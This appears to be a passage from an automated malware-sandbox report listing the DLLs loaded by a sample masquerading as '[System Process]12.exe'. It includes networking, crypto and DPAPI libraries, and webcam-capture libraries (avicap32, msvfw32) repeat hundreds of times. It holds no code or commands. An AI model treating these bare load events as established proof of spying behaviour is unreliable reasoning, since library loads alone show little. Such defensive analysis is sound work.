Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
